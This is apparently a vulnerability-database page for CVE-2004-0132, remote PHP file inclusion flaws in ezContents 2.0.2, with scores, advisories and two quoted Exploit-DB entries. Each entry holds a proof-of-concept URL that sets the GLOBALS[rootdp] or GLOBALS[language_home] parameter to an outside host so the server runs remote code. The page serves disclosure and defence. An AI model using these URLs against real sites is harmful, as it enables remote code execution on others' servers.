CVE-2004-0132
published 2004-03-03CVE-2004-0132: Multiple PHP remote file inclusion vulnerabilities in ezContents 2.0.2 and earlier allow remote attackers to execute arbitrary PHP code from a remote web…
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.38%
81.8th percentile
Multiple PHP remote file inclusion vulnerabilities in ezContents 2.0.2 and earlier allow remote attackers to execute arbitrary PHP code from a remote web server, as demonstrated using (1) the GLOBALS[rootdp] parameter to db.php, or (2) the GLOBALS[language_home] parameter to archivednews.php, and a malicious version of lang_admin.php.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| visualshapers | ezcontents | — | — |
| visualshapers | ezcontents | — | — |
| visualshapers | ezcontents | — | — |
| visualshapers | ezcontents | — | — |
| visualshapers | ezcontents | — | — |
| visualshapers | ezcontents | — | — |
| visualshapers | ezcontents | — | — |
| visualshapers | ezcontents | — | — |
| visualshapers | ezcontents | — | — |
| visualshapers | ezcontents | — | — |
| visualshapers | ezcontents | — | — |
| visualshapers | ezcontents | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9vjx-8hr9-q3m8: PHP remote file inclusion vulnerability in modules/calendar/minicalendar
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2008-3575 [HIGH] CWE-94 GHSA-9vjx-8hr9-q3m8: PHP remote file inclusion vulnerability in modules/calendar/minicalendar
PHP remote file inclusion vulnerability in modules/calendar/minicalendar.php in ezContents CMS allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[gsLanguage] parameter, a different vector than CVE-2006-4477 and CVE-2004-0132.
GHSA
GHSA-r6cx-px2r-vrvr: Multiple PHP remote file inclusion vulnerabilities in ezContents 2
ghsa_unreviewed·2022-04-29
CVE-2004-0132 [HIGH] GHSA-r6cx-px2r-vrvr: Multiple PHP remote file inclusion vulnerabilities in ezContents 2
Multiple PHP remote file inclusion vulnerabilities in ezContents 2.0.2 and earlier allow remote attackers to execute arbitrary PHP code from a remote web server, as demonstrated using (1) the GLOBALS[rootdp] parameter to db.php, or (2) the GLOBALS[language_home] parameter to archivednews.php, and a malicious version of lang_admin.php.
No detection rules found.
Exploit-DB
VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion
exploitdb·2004-02-11
CVE-2004-0132 VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion
VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion
---
source: https://www.securityfocus.com/bid/9638/info
It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules.
This vulnerability is reported to affect ezContents 2.0.2 and prior running on PHP 4.3.0 or above.
http://www.example.com/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://www.example.com/&GLOBALS[gsLanguage]=ezContents
Exploit-DB
VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion
exploitdb·2004-02-11
CVE-2004-0132 VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion
VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion
---
source: https://www.securityfocus.com/bid/9638/info
It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules.
This vulnerability is reported to affect ezContents 2.0.2 and prior running on PHP 4.3.0 or above.
http://www.example.com/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://www.example.com/
No writeups or analysis indexed.
2004-03-03
Published